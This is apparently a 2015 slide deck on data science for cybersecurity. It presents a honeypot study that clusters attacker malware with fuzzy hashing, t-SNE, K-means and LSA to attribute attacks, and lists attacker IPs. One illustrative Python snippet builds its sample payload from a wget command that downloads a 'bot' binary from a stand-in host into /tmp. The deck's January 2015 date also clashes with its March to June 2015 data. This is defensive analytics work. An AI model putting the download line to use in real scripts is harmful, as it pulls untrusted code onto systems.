Applications of Data Science in Cyber-Security
Richard Xie
https://linkedin.com/in/richardxy
January 2015
What is Cyber-Security?
• A.K.A.
  – computer security, network security
• Secure network assets from intrusions and data breaches
• Assets include:
  – servers, workstations, mobile devices
• Layers to secure:
  – firewall, operating systems, files, credentials, etc.
Why Is It Important?
http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Severe shortage of experts predicted
Cyber-Security + Data Science
Common Threats
• Exploitation of software vulnerabilities
• Fraud: spoofing, phishing, pharming
• Malicious code (worms, viruses, spyware, etc.)
• DDoS
How Can Data Science Help?
• Cyber-security is a big-data business
  – network logs
  – files
  – user-machine interactions
  – volume, velocity, variety, and veracity
• Data science is positioned to be the engine that powers next-generation cyber-security solutions
Application Examples
• Spam email classification
• Malware classification
• Malicious IP classification
• Intrusion detection
• Network anomaly detection
• Hacker attribution
• and more...
A Real Case Study
• Hunting for Honeypot Attackers: A Data Scientist’s Adventure
• A honeynet is a set of honeypot systems deployed on the internet
• A honeypot logs all hacking activity
• A honeypot stores files uploaded by hackers
• Malware serves as the hackers' weapon
Raw Statistics
• Data collection period
  – from March 2015 through the end of June 2015
• >21k attacker IP addresses
• 36 million SSH attempts
• 34k unique usernames + 1 million passwords tried
• 500 malicious domains and >1000 unique malware samples identified
Geo-location of Attacks
map_hacker_IP.py
Time Series of Attacks
time_series_activity.py
What the Raw Data Look Like
Questions to Answer
• Clustering downloaded/crawled files to find file groups/categories
• Attribution
  – association between attacks from different days and IPs
  – where they came from
File Similarity Computation
• An MD5 hash changes completely when a file changes slightly, so it can't show how similar two files are
• Fuzzy hashing can
• Using ssdeep, I computed pair-wise similarity for all collected binary files and tar files
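To make the contrast concrete, here is a minimal sketch using only the Python standard library. The sample payload is made up, and `difflib.SequenceMatcher` is only a stand-in for a fuzzy hash so the snippet runs without extra packages; it is not how ssdeep computes its score, and `rough_similarity` is a hypothetical helper name.

```python
import hashlib
from difflib import SequenceMatcher


def md5_hex(data: bytes) -> str:
    """Return the MD5 digest of the data as a hex string."""
    return hashlib.md5(data).hexdigest()


def rough_similarity(a: bytes, b: bytes) -> int:
    """Return a 0-100 score; a stand-in for a fuzzy-hash comparison."""
    matcher = SequenceMatcher(None, a, b, autojunk=False)
    return round(100 * matcher.ratio())


# Hypothetical sample: two payloads that differ in a single byte.
original = b"#!/bin/sh\nwget http://example.invalid/bot -O /tmp/bot\n" * 20
variant = original.replace(b"/tmp/bot", b"/tmp/bo7", 1)

same_md5 = md5_hex(original) == md5_hex(variant)
score = rough_similarity(original, variant)

# The digests differ entirely, while the similarity score stays high.
print(same_md5, score)
```

With a real fuzzy hash the comparison runs on short signatures rather than on the full file contents, which is what makes pair-wise scoring of a whole collection practical.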
Steps to prepare data
• readRawData.py to create a collection "downloadsCollection"
• extract_crawled_file_to_mongo.py to create crawledFileCollection
• uniq_ip_count_MR.js to create uniqURLCollection
• uniq_ip_date_MR.js to create uniqURLDateCollection
• uniq_date_ip_MR.js to create uniqDateURLCollection
• uniq_hash_count_MR.js to create uniqFileCollection
• uniq_country_count_MR.js to create uniqCountryCollection
Graph of Files
Two files are connected when their similarity exceeds a threshold (for example, > 60%)
identifySimilarDownloads.py from line 166
./graphiti demo graph_data/weighted_files2.json
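The graph construction can be sketched as follows. This is not the code in identifySimilarDownloads.py; it assumes a hypothetical dict of pair-wise scores on a 0-100 scale, links two files when their score exceeds the threshold, and then lists the connected groups. File names and scores are invented for illustration.

```python
def build_graph(pair_scores, threshold=60):
    """Return an adjacency map linking files whose score exceeds threshold."""
    graph = {}
    for (a, b), score in pair_scores.items():
        # Register both files so isolated files still appear as nodes.
        graph.setdefault(a, set())
        graph.setdefault(b, set())
        if score > threshold:
            graph[a].add(b)
            graph[b].add(a)
    return graph


def connected_groups(graph):
    """Return the connected components as sorted lists of file names."""
    seen, groups = set(), []
    for start in sorted(graph):
        if start in seen:
            continue
        stack, group = [start], set()
        while stack:
            node = stack.pop()
            if node in group:
                continue
            group.add(node)
            stack.extend(graph[node] - group)
        seen |= group
        groups.append(sorted(group))
    return groups


# Hypothetical pair-wise similarity scores (0-100).
pair_scores = {
    ("a.bin", "b.bin"): 88,
    ("b.bin", "c.bin"): 72,
    ("a.bin", "c.bin"): 41,
    ("c.bin", "d.tar"): 0,
}
groups = connected_groups(build_graph(pair_scores))
print(groups)
```

Note that a.bin and c.bin land in the same group even though their direct score is below the threshold, because both are linked to b.bin.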
Files -> Hacker
• A hacker may use the same or similar tools on different days to hack systems
• The file similarity matrix may provide hints about who was using those files
• Treat date+IP as a unique attack, and all its associated binary files as its features
• Construct a term matrix for all attacks
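A minimal sketch of the term matrix described above, assuming a hypothetical list of (date, IP, file hash) download records. Each row is one date+IP attack, each column is one file, and a cell is 1 when that file was seen in that attack. The `%%` separator follows the attack labels used later in the deck; the records and the function name `build_attack_matrix` are made up.

```python
def build_attack_matrix(downloads):
    """Build a binary attack-by-file matrix from (date, ip, file_hash) records."""
    attacks = sorted({f"{date}%%{ip}" for date, ip, _ in downloads})
    files = sorted({file_hash for _, _, file_hash in downloads})
    row = {attack: i for i, attack in enumerate(attacks)}
    col = {file_hash: j for j, file_hash in enumerate(files)}
    matrix = [[0] * len(files) for _ in attacks]
    for date, ip, file_hash in downloads:
        matrix[row[f"{date}%%{ip}"]][col[file_hash]] = 1
    return attacks, files, matrix


# Hypothetical records; IPs come from documentation-only address ranges.
downloads = [
    ("2015-03-23", "192.0.2.10", "hashA"),
    ("2015-03-23", "192.0.2.10", "hashB"),
    ("2015-03-24", "192.0.2.10", "hashA"),
    ("2015-03-24", "198.51.100.7", "hashC"),
]
attacks, files, matrix = build_attack_matrix(downloads)
for attack, features in zip(attacks, matrix):
    print(attack, features)
```

Here files play the role that terms play in a document-term matrix, and attacks play the role of documents.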
t-SNE on Attack-Malware Matrix with K-Means Labeling
k=10
t-SNE: t-Distributed Stochastic Neighbor Embedding
get_similar_IPs.py from line 181
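The K-means labeling step can be sketched in plain Python as below. This is not the code in get_similar_IPs.py: the t-SNE projection is not reproduced, the 2-D points are invented, k is 2 rather than 10 to keep the example small, and seeding the centroids with the first k points is a simplification chosen to make the run deterministic. In practice a library such as scikit-learn would likely handle both t-SNE and K-means.

```python
def kmeans(points, k, iterations=20):
    """Plain Lloyd's algorithm; the first k points seed the centroids."""
    centroids = [list(p) for p in points[:k]]
    labels = [0] * len(points)
    for _ in range(iterations):
        # Assignment step: nearest centroid by squared Euclidean distance.
        labels = [
            min(
                range(k),
                key=lambda c: sum((x - y) ** 2 for x, y in zip(p, centroids[c])),
            )
            for p in points
        ]
        # Update step: move each centroid to the mean of its members.
        for c in range(k):
            members = [p for p, label in zip(points, labels) if label == c]
            if members:
                centroids[c] = [sum(dim) / len(members) for dim in zip(*members)]
    return labels, centroids


# Hypothetical 2-D embedding of six attacks forming two tight groups.
points = [(0.0, 0.1), (5.0, 5.1), (0.2, 0.0), (5.2, 4.9), (0.1, 0.2), (4.9, 5.0)]
labels, centroids = kmeans(points, k=2)
print(labels)
```

The resulting labels are what would color the points in a scatter plot of the embedding.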
Latent Semantic Analysis
• LSA is widely used in NLP for topic finding
• Analyzes relationships between a set of documents and the terms they contain
• Uses SVD to reduce the number of dimensions while maintaining record similarities
SVD: Singular Value Decomposition
Attacks Expressed with 1st and 2nd Principal Components
Each vector is a date+IP incident (a row in the term matrix)
Compute Similarities among Attacks
• Similar attacks to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to
  2015-03-23%%118.193.241.192, similarity 0.958453
  2015-03-23%%222.186.190.157:56789, similarity 0.996835
  2015-03-24%%222.186.190.157:56789, similarity 0.961000
  2015-03-25%%117.21.176.79:333, similarity 0.997087
  2015-03-25%%222.186.190.157:56789, similarity 0.946751
  2015-06-17%%222.186.30.175:56789, similarity 0.996835
  2015-06-17%%61.160.247.42:1988, similarity 0.996835
  2015-06-18%%222.186.30.175:56789, similarity 0.996835
  2015-06-18%%61.160.247.42:1988, similarity 0.996835
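A ranking like the one above can be sketched as follows, assuming the similarity is cosine similarity between the reduced attack vectors; the slides do not state which measure was used. The vectors, the documentation-range IPs, and the helper names are hypothetical.

```python
import math


def cosine_similarity(u, v):
    """Cosine of the angle between two vectors; 0.0 if either is all zeros."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0 or norm_v == 0:
        return 0.0
    return dot / (norm_u * norm_v)


def most_similar(target, vectors, top_n=3):
    """Rank every other attack by similarity to the target attack."""
    scores = [
        (name, cosine_similarity(vectors[target], vec))
        for name, vec in vectors.items()
        if name != target
    ]
    return sorted(scores, key=lambda item: item[1], reverse=True)[:top_n]


# Hypothetical 2-D attack vectors keyed by date%%IP.
vectors = {
    "2015-03-23%%192.0.2.10": [1.0, 0.0],
    "2015-03-24%%192.0.2.10": [2.0, 0.0],
    "2015-03-24%%198.51.100.7": [0.0, 1.0],
    "2015-03-25%%203.0.113.5": [1.0, 1.0],
}
ranked = most_similar("2015-03-23%%192.0.2.10", vectors)
for name, score in ranked:
    print(f"{name}, similarity {score:.6f}")
```

Cosine similarity ignores vector length, so an attack that reuses the same tools scores close to 1 regardless of how many files it uploaded.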
Time Series of Attack Counts for Group 1
Time Series of Attack Counts for Group 2
Visualization of Attack Graph
./graphiti demo graph_data/weighted_IPs_95percent.json
We know where they were from
python_map_IP_latlon.py
So what?
• The analysis may lead to
  – near-real-time attribution (is it a new attack, or something we saw before?)
  – near-real-time triage of new malware (is it new, or a variant of an existing one?)
  – more...